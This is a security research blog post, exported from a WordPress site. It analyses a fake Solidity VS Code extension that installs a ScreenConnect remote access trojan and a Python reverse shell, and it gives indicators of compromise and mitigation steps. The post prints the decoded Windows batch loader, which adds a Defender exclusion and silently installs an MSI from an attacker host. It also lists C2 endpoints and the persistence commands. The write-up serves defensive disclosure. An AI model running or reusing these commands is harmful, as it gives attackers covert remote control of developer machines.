{"id":106616,"date":"2026-01-30T00:01:00","date_gmt":"2026-01-29T22:01:00","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?post_type=zero-post&#038;p=106616"},"modified":"2026-02-02T11:59:42","modified_gmt":"2026-02-02T09:59:42","slug":"solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/","title":{"rendered":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT)"},"content":{"rendered":"<p>\n  Imagine sitting down to start working on a Smart Contract project, installing\n  an IDE extension to support the Solidity language you plan to use, and finding\n  out that some adversary now remotely controls your developer machine. Someone\n  tried to make that nightmare come true; fortunately, Checkmarx Zero got it\n  taken down less than a day after it was published.\n<\/p>\n<p>\n  Unfortunately, this isn\u2019t a new problem. Over the last few years, the\n  Solidity\/VS Code ecosystem has had a recurring issue with look-alike\n  publishers and extensions that impersonate the legitimate Solidity tooling\n  published by Juan Blanco (GitHub:\n  <a href=\"https:\/\/github.com\/juanfranblanco\">juanfranblanco<\/a>). 
The\n  <em>legitimate<\/em> Solidity\n  <a href=\"https:\/\/github.com\/juanfranblanco\/vscode-solidity\"><u>extension\u2019s own repository<\/u><\/a>\n  even explicitly warns users to watch for impersonations and to check\n  publishing history.\n<\/p>\n<figure>\n  <img decoding=\"async\" src=\"\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda_image1.webp\" alt=\"screenshot of the warning from the official repository on GitHub\">\n  <figcaption aria-hidden=\"true\">\n    screenshot of the warning from the official repository on GitHub\n  <\/figcaption>\n<\/figure>\n<p>\n  We uncovered a new malicious extension published under the publisher\n  juanblan281 (extension <strong>solid281<\/strong>, display name with\n  <strong>zero-width characters<\/strong>: solidit\\u200b\\u200by\\u200b; this would\n  look like \u201csolidity\u201d to human readers). We reported it to the Visual Studio\n  Code Marketplace, who have promptly taken it down. Fortunately, the attacker\n  did not publish it to alternative marketplaces like OpenVSX.\n<\/p>\n<p>\n  The extension is wired to run automatically on startup (onStartupFinished) and\n  immediately executes a heavily obfuscated loader.\n<\/p>\n<p>\n  This is exactly the kind of supply-chain pattern we keep seeing across\n  developer marketplaces (VS Code Marketplace, OpenVSX). Prior public reporting\n  has shown multiple Solidity-targeting extension campaigns using impersonation,\n  obfuscation, and post-install payload delivery. 
(<a href=\"https:\/\/www.kaspersky.com\/blog\/malicious-extensions-for-cursor-ai\/53802\/\"><u>Example 1<\/u><\/a>,\n  <a href=\"https:\/\/github.com\/eclipse\/openvsx\/issues\/1400\"><u>Example 2<\/u><\/a>)\n<\/p>\n\n\n<h2 id=\"continuous-targeting-of-juan-blancos-solidity-extension\" class=\"article-anchor\">\n  Continuous Targeting of Juan Blanco\u2019s Solidity Extension\n<\/h2>\n<p>\n  The official \u201cSolidity by Juan Blanco\u201d extension has been repeatedly targeted\n  by malicious impersonator extensions on both the VS Code Marketplace and the\n  Open VSX registry. Attackers publish extensions that try to pass as the real\n  one by imitating the name or publisher and reusing the marketplace description\n  and page layout to blend in. To make the listing even more convincing, they\n  often boost download figures so the extension appears popular and safe.\n<\/p>\n<p>\n  One notable case was a fake \u201cSolidity Language Support\u201d extension by a\n  publisher called ShowSnowcrypto, which appeared in VS Code\u2019s Marketplace with\n  nearly 2.9 million installs, even surpassing the real extension\u2019s download\n  count. Around the same time, security researchers identified a malicious\n  impersonation of a \u201cSolidity\u201d extension on Open VSX, published under\n  \u201cjuan-blanco\u201d (with a hyphen) to resemble the legitimate juanblanco publisher.\n  These incidents were widely discussed, highlighting how often malware authors\n  take advantage of the Juan Blanco Solidity extension\u2019s popularity.\n<\/p>\n<h2 id=\"what-it-does\" class=\"article-anchor\">What it Does<\/h2>\n<h3 id=\"windows\">Windows<\/h3>\n<ol type=\"1\">\n  <li>\n    <p>Drops a batch script to `<code>%TEMP%\\\\extension.bat<\/code><\/p>\n  <\/li>\n  <li>\n    <p>\n      Attempts <strong>UAC elevation<\/strong> via\n      <code>PowerShell Start-Process \\... 
-Verb RunAs<\/code>\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      Adds a <strong>Microsoft Defender exclusion<\/strong> for\n      <strong>Program Files (x86)\/*<\/strong>\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      Silently installs\n      <strong>ScreenConnect \/ ConnectWise Control<\/strong> from attacker\n      infrastructure. These are remote access tools that are being misused by\n      the attacker to gain unauthorized remote access to the developer\n      workstation.\n    <\/p>\n  <\/li>\n<\/ol>\n<h3 id=\"macos-linux\">macOS \/ Linux<\/h3>\n<ol type=\"1\">\n  <li>\n    <p>\n      Drops a Python implant (reverse shell), allowing attackers unauthorized\n      remote access to the developer\u2019s system.\n    <\/p>\n  <\/li>\n  <li>\n    <p><strong>Persists<\/strong><\/p>\n    <ul>\n      <li>\n        <p>\n          macOS:\n          <code>LaunchAgent (~\/Library\/LaunchAgents\/...plist)<\/code> and\n          <code>launchctl load<\/code>\n        <\/p>\n      <\/li>\n      <li>\n        <p>\n          Linux: attempts a user systemd unit\n          (<code>~\/.config\/systemd\/user\/testscript.service<\/code>) and\n          <code>systemctl --user enable\/start<\/code> (note: the code shows a\n          bug where scriptPath is undefined, so the Linux persistence\n          <em>may fail<\/em> depending on runtime)\n        <\/p>\n      <\/li>\n    <\/ul>\n  <\/li>\n<\/ol>\n<p>\n  This mirrors broader patterns reported by other teams: Solidity developers\n  appear to be targeted specifically, including campaigns that used fake\n  Solidity extensions to install ScreenConnect and then deploy follow-on\n  payloads.\n<\/p>\n<h2 id=\"technical-breakdown-how-attackers-gain-remote-access-to-developer-machines\" class=\"article-anchor\">\n  Technical breakdown: how attackers gain remote access to developer machines\n<\/h2>\n<h3 id=\"windows-chain-uac-prompt-defender-exclusion-silent-screenconnect-install\">\n  1) Windows chain: UAC prompt \u2192 Defender exclusion \u2192 
silent ScreenConnect\n  install\n<\/h3>\n<p>The decoded Windows payload is the clearest \u201cintent\u201d signal:<\/p>\n<div class=\"sourceCode\" id=\"cb1\">\n  <pre class=\"sourceCode bat\"><code class=\"sourceCode dosbat\"><span id=\"cb1-1\"><a href=\"#cb1-1\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"kw\">@<\/span><span class=\"bu\">echo off<\/span><\/span>\n<span id=\"cb1-2\"><a href=\"#cb1-2\" aria-hidden=\"true\" tabindex=\"-1\"><\/a>powershell.exe <span class=\"at\">-WindowStyle<\/span> Hidden <span class=\"at\">-NoProfile<\/span> <span class=\"at\">-Command<\/span> <span class=\"st\">&quot;Add-MpPreference -ExclusionPath ([Environment]::GetFolderPath(&#39;ProgramFilesX86&#39;))&quot;<\/span><\/span>\n<span id=\"cb1-3\"><a href=\"#cb1-3\" aria-hidden=\"true\" tabindex=\"-1\"><\/a>msiexec.exe <span class=\"at\">\/i<\/span> <span class=\"st\">&quot;http:\/\/meow[.]undefined21[.]com:8040\/Bin\/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest&quot;<\/span> <span class=\"at\">\/qn<\/span> <span class=\"at\">\/norestart<\/span><\/span>\n<span id=\"cb1-4\"><a href=\"#cb1-4\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"bu\">del<\/span> <span class=\"st\">&quot;<\/span><span class=\"pp\">%~f<\/span><span class=\"va\">0<\/span><span class=\"st\">&quot;<\/span><\/span><\/code><\/pre>\n<\/div>\n<p>(Note: safety adjustments made)<\/p>\n<h4 id=\"why-this-matters\">Why this matters<\/h4>\n<ul>\n  <li>\n    <p>\n      <code>Add-MpPreference -ExclusionPath &lt;dir&gt;<\/code>: Defender\n      explicitly documents that this disables scheduled + real-time scanning for\n      that directory.\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      <code>msiexec \/qn<\/code>: fully silent install (no UI), classic for\n      unattended deployment by malware. 
The URL provided as an argument\n      downloads the ScreenConnect remote-access tool for installation (we added\n      brackets to avoid accidents)\n    <\/p>\n  <\/li>\n<\/ul>\n<p>\n  The loader also checks for an existing\n  <strong>\u201cScreenConnect Client\u201d<\/strong> directory under Program Files (x86)\n  and exits if found (suggesting the actor expects repeated runs \/ reinfection\n  attempts).\n<\/p>\n<h3 id=\"macos-persistence-launchagent-hidden-dropped-script\">\n  2) macOS persistence: LaunchAgent + hidden dropped script\n<\/h3>\n<p>\n  The macOS branch writes the reverse shell Python file and then creates a\n  LaunchAgent plist with <code>RunAtLoad<\/code>, loading it via\n  <code>launchctl<\/code>. (common persistence mechanism on macOS.)\n<\/p>\n<h3 id=\"linux-persistence-attempt-systemd-user-service\">\n  3) Linux persistence attempt: systemd user service\n<\/h3>\n<p>\n  The Linux branch tries to create a user unit at:\n  <code>~\/.config\/systemd\/user\/testscript.service<\/code> then runs:\n<\/p>\n<div class=\"sourceCode\" id=\"cb2\">\n  <pre class=\"sourceCode sh\"><code class=\"sourceCode bash\"><span id=\"cb2-1\"><a href=\"#cb2-1\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"ex\">systemctl<\/span> <span class=\"at\">--user<\/span> enable testscript.service<\/span>\n<span id=\"cb2-2\"><a href=\"#cb2-2\" aria-hidden=\"true\" tabindex=\"-1\"><\/a><span class=\"ex\">systemctl<\/span> <span class=\"at\">--user<\/span> start testscript.service<\/span><\/code><\/pre>\n<\/div>\n<p>\n  However, scriptPath is undefined in the unit template, so the Linux\n  persistence may not work as intended in this exact build.\n<\/p>\n<h3 id=\"python-implant-reverse-shell-over-xor-encryption\">\n  4) Python implant: reverse shell over XOR \u201cencryption\u201d\n<\/h3>\n<p>The python payload is a classic interactive reverse shell:<\/p>\n<ul>\n  <li>\n    <p>connects to <code>c[.]undefined21[.]com:4444<\/code><\/p>\n  <\/li>\n  <li>\n    <p>sends a 
victim identifier <code>__NAME__:user@host<\/code><\/p>\n  <\/li>\n  <li>\n    <p>spawns <code>\/bin\/bash<\/code> under a PTY<\/p>\n  <\/li>\n  <li><p>multiplexes socket \u2194\ufe0e PTY I\/O<\/p><\/li>\n  <li>\n    <p>supports <code>__PING__ \/ __PONG__<\/code><\/p>\n  <\/li>\n<\/ul>\n<h2 id=\"this-is-part-of-a-larger-adversarial-pattern-context\" class=\"article-anchor\">\n  This is part of a larger adversarial pattern (context)\n<\/h2>\n<p>This incident is not happening in a vacuum:<\/p>\n<ul>\n  <li>\n    <p>\n      <strong>OpenVSX has had repeated \u201cJuan Blanco look-alike\u201d reports<\/strong>, including an OpenVSX issue opened by the legitimate author pointing to\n      a fake <strong>juanbIanco<\/strong> publisher (uppercase \u201cI\u201d\n      impersonation).\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      <strong>Solidity developers are a known target set<\/strong> for malicious\n      VS Code extensions. Datadog\u2019s Security Labs documented a campaign\n      (MUT-9332) using impersonation and obfuscation to deliver malicious\n      behavior to Solidity developers.\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      <strong>ScreenConnect as a follow-on payload<\/strong> in fake Solidity\n      extensions has been reported publicly (OpenVSX ecosystem), including cases\n      where ScreenConnect was used to deliver additional tooling and steal\n      crypto assets.\n    <\/p>\n  <\/li>\n  <li>\n    <p>\n      The broader \u201cmalicious extension marketplace\u201d problem keeps repeating\n      across multiple stores and publisher accounts.\n    <\/p>\n  <\/li>\n<\/ul>\n<h2 id=\"section\" class=\"article-anchor\"><\/h2>\n<h2 id=\"a-calling-card-in-the-source-ascii-art-a-pointed-message\" class=\"article-anchor\">\n  A \u201ccalling card\u201d in the source: ASCII art + a pointed message\n<\/h2>\n<p>\n  Before the obfuscated loader starts, the attacker left a header comment in\n  <code>webpack.js<\/code> that looks like a signature: a block of Unicode 
\u201cASCII\n  art\u201d followed by a short note clearly written for humans reviewing the sample.\n<\/p>\n<p>\n  The emoji choice is a clear taunt aimed at the devs of the\n  <a href=\"https:\/\/thehackernews.com\/2025\/12\/glassworm-returns-with-24-malicious.html\">recent GlassWorm campaign<\/a>.\n  The \ud83e\udd5b\ud83e\udeb1 \u201cglass worm\u201d combination is hard to ignore given\n  recent public reporting around \u201cworm-like\u201d VS Code\/OpenVSX marketplace malware\n  and invisible\/Unicode tricks, such as the GlassWorm campaign the threat actors are\n  referencing.\n<\/p>\n<figure>\n  <img decoding=\"async\" src=\"\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda_image2.webp\" alt=\"screenshot of \u201ccalling card\u201d in webpack.js\">\n  <figcaption aria-hidden=\"true\">\n    screenshot of \u201ccalling card\u201d in webpack.js\n  <\/figcaption>\n<\/figure>\n<h2 id=\"mitigation-checklist\" class=\"article-anchor\">Mitigation Checklist<\/h2>\n<p>\n  If you suspect this extension was installed,\n  <mark>treat the host as compromised:<\/mark>\n  <strong>isolate it, remove the extension, and hunt for persistence + IoCs before\n    returning it to normal use.<\/strong>\n<\/p>\n<ol type=\"1\">\n  <li><p>Remove the extension from affected machines.<\/p><\/li>\n  <li>\n    <p>Windows:<\/p>\n    <ul>\n      <li>\n        <p>\n          Check installed programs\/services for ScreenConnect \/ ConnectWise\n          Control.\n        <\/p>\n      <\/li>\n      <li>\n        <p>\n          Review Defender exclusions for unexpected entries (especially\n          <code>Program Files (x86)<\/code>).\n        <\/p>\n      <\/li>\n    <\/ul>\n  <\/li>\n  <li>\n    <p>macOS:<\/p>\n    <ul>\n      <li>\n        Inspect <code>~\/Library\/LaunchAgents\/<\/code> for the listed plist and any recent\n        additions.\n      <\/li>\n    <\/ul>\n  <\/li>\n  <li>\n    <p>Linux:<\/p>\n    <ul>\n      <li>\n        
Inspect <code>~\/.config\/systemd\/user\/<\/code> and\n        <code>systemctl --user list-units<\/code> for suspicious services.\n      <\/li>\n    <\/ul>\n  <\/li>\n<\/ol>\n<h2 id=\"indicators-of-compromise\" class=\"article-anchor\">Indicators of Compromise<\/h2>\n<h3 id=\"network\">Network<\/h3>\n<p>Outgoing connections to any of the following resources:<\/p>\n<pre class=\"text\"><code>meow[.]undefined21[.]com:8040\nc[.]undefined21[.]com:4444\nhttp[:]\/\/meow[.]undefined21[.]com:8040\/Bin\/ScreenConnect.ClientSetup.msi?e=Access&amp;y=Guest<\/code><\/pre>\n<h3 id=\"dropped-files-persistence\">Dropped files \/ persistence<\/h3>\n<p>Files matching the following naming schemes:<\/p>\n<pre class=\"text\"><code>%TEMP%\\extension.bat\n\/tmp\/.test.py\n~\/Library\/LaunchAgents\/com.example.testscript.plist\n~\/.config\/systemd\/user\/testscript.service<\/code><\/pre>\n<h3 id=\"virustotal-scan-screenconnect-exe\">\n  VirusTotal Scan (ScreenConnect exe)\n<\/h3>\n<p>\n  <a href=\"https:\/\/www.virustotal.com\/gui\/file\/27839e28629d80a917e2f0b0cbc2c1d87a3b2ab7b620d133672712b801104236?nocache=1\">VirusTotal page for the ScreenConnect.ClientSetup.msi installer<\/a>\n<\/p>\n<p>\n  File hash:\n  <code>27839e28629d80a917e2f0b0cbc2c1d87a3b2ab7b620d133672712b801104236<\/code>\n<\/p>\n<p>\n  Note: ScreenConnect is legitimate software often used for remote machine\n  management; however, it is also frequently used as a Remote Access Trojan\n  (RAT) by various adversaries. 
If your organization has not adopted it for\n  legitimate purposes, you should treat its presence as an indicator of\n  compromise.\n<\/p>\n<h2 id=\"timeline\" class=\"article-anchor\">Timeline<\/h2>\n<ul>\n  <li>\n    <p>\n      <strong>2026-01-08 21:08:41 UTC<\/strong> \u2014 Extension published \/ release\n      date (<code>juanblan281.solid281<\/code>).\n    <\/p>\n  <\/li>\n  <li>\n    <p><strong>2026-01-09 00:45:38 UTC<\/strong> \u2014 Last updated.<\/p>\n  <\/li>\n  <li>\n    <p><strong>2026-01-09 12:37 UTC<\/strong> \u2014 Reported to the Marketplace.<\/p>\n  <\/li>\n  <li>\n    <p>\n      <strong>2026-01-09 15:47 UTC<\/strong> \u2014 Marketplace confirmed takedown;\n      listing is no longer accessible.\n    <\/p>\n  <\/li>\n<\/ul>\n\n\n<style type=\"text\/css\">.cxzero-social{margin-top:1em;padding-top:1em;border-top:1px solid #121086;border-bottom:1px solid #121086;padding-bottom:1em}.cxzero-social p{padding-top:.8em}.cxzero-social .cxzero-social-links{margin-left:.8em}.cxzero-social .social-link{margin-left:.6em}.cxzero-social .social-button{padding:.6em;margin:.2em .2em .2em .2em;white-space:nowrap}.cxzero-social .social-button svg,.cxzero-social .social-link svg{vertical-align:middle;height:1.3em}.cxzero-social .social-button a,.cxzero-social .social-link a{text-decoration:none !important}<\/style> <div class=\"cxzero-social\">\n<p> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/www.linkedin.com\/sharing\/share-offsite\/?url={url}\" onload=\"\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"LinkedIn Icon\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> Share on LinkedIn<\/a><\/span> <span class=\"social-button\"><a class=\"social-action\" 
href=\"https:\/\/bsky.app\/intent\/compose?text=I%20just%20read%20%22{title}%22%20from%20Checkmarx%20Zero%20{url}\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Bluesky Icon\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> Share on Bluesky<\/a><\/span> <\/p>\n<p class=\"cxzero-social-links\">Follow <a href=\"\/zero\/\">Checkmarx Zero<\/a>: <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/www.linkedin.com\/showcase\/checkmarx-zero\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"Checkmarx Zero on LinkedIn\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> <\/a><\/span> <span 
class=\"social-link\"><a class=\"social-icon\" href=\"https:\/\/bsky.app\/profile\/checkmarxzero.bsky.social\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Checkmarx Zero on Bluesky\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/x.com\/CheckmarxZero\"><svg alt=\"Checkmarx Zero on X\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" viewbox=\"0 0 512 462.799\"><path fill-rule=\"nonzero\" d=\"M403.229 0h78.506L310.219 196.04 512 462.799H354.002L230.261 301.007 88.669 462.799h-78.56l183.455-209.683L0 0h161.999l111.856 147.88L403.229 0zm-27.556 415.805h43.505L138.363 44.527h-46.68l283.99 371.278z\"><\/path><\/svg> <\/a><\/span> <\/p> <script>function social_action_template(a){const b=encodeURIComponent(window.location.href);const c=document.querySelector(\"h1\");let headContent=(c==null?\"\":c.textContent);let processed=a.replace(\/\\{title\\}\/g,encodeURIComponent(headContent));processed=processed.replace(\/\\{url\\}\/g,b);return processed}var 
","protected":false},"excerpt":{"rendered":"<p>We took down yet another malicious VS Code extension trying to target Solidity \/ Ethereum developers with a Remote Access Trojan (RAT). We break down the campaign, key indicators of compromise, and practical steps teams can take to reduce exposure to malicious marketplace packages.<\/p>\n","protected":false},"author":164,"featured_media":106624,"template":"","zero-category":[1067,1176,1104],"zero-tag":[1180,1450,1458],"class_list":["post-106616","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-blog","zero-category-security-blogs","zero-category-technical-blog","zero-tag-malware","zero-tag-vscode","zero-tag-vscode-extension"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx<\/title>\n<meta name=\"description\" content=\"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. 
IoCs + mitigation.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx\" \/>\n<meta property=\"og:description\" content=\"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. IoCs + mitigation.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\" \/>\n<meta property=\"og:site_name\" content=\"Checkmarx\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T09:59:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@checkmarx\" \/>\n<meta name=\"twitter:label1\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\",\"url\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\",\"name\":\"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx\",\"isPartOf\":{\"@id\":\"https:\/\/checkmarx.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\",\"datePublished\":\"2026-01-29T22:01:00+00:00\",\"dateModified\":\"2026-02-02T09:59:42+00:00\",\"description\":\"A fake Solidity VS Code extension impersonated Juan Blanco and installed ScreenConnect\/ConnectWise Control for remote access\u2014takedown in 24h. 
IoCs + mitigation.\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/zero-post\/solidity-devs-targeted-again-malicious-vs-code-extension-drops-screenconnect-based-remote-access-trojan-rat\/#primaryimage\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2026\/01\/2026-01_cxzero_feature_-_solidity_devs_targeted_vscode_screenconnect_rat_-_silva_miranda.webp\",\"width\":2560,\"height\":1280,\"caption\":\"a developer at a workstation is tugged by puppet strings from a large ghostly hand above, while a VS Code extensions screen shows \u201cSolidity\u201d and a \u201cScreenConnect\u201d tag, suggesting a compromised dev setup.\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/checkmarx.com\/#website\",\"url\":\"https:\/\/checkmarx.com\/\",\"name\":\"Checkmarx\",\"description\":\"The world runs on code. 
We secure it.\",\"publisher\":{\"@id\":\"https:\/\/checkmarx.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/checkmarx.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/checkmarx.com\/#organization\",\"name\":\"Checkmarx\",\"url\":\"https:\/\/checkmarx.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"contentUrl\":\"https:\/\/checkmarx.com\/wp-content\/uploads\/2024\/02\/logo-dark.svg\",\"width\":1,\"height\":1,\"caption\":\"Checkmarx\"},\"image\":{\"@id\":\"https:\/\/checkmarx.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\",\"https:\/\/x.com\/checkmarx\",\"https:\/\/www.youtube.com\/user\/CheckmarxResearchLab\",\"https:\/\/www.linkedin.com\/company\/checkmarx\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Solidity devs targeted again: Malicious VS Code extension drops ScreenConnect-based remote access trojan (RAT) - Checkmarx","description":"A fake Solidity VS Code extension impersonated Juan Blanco and installed 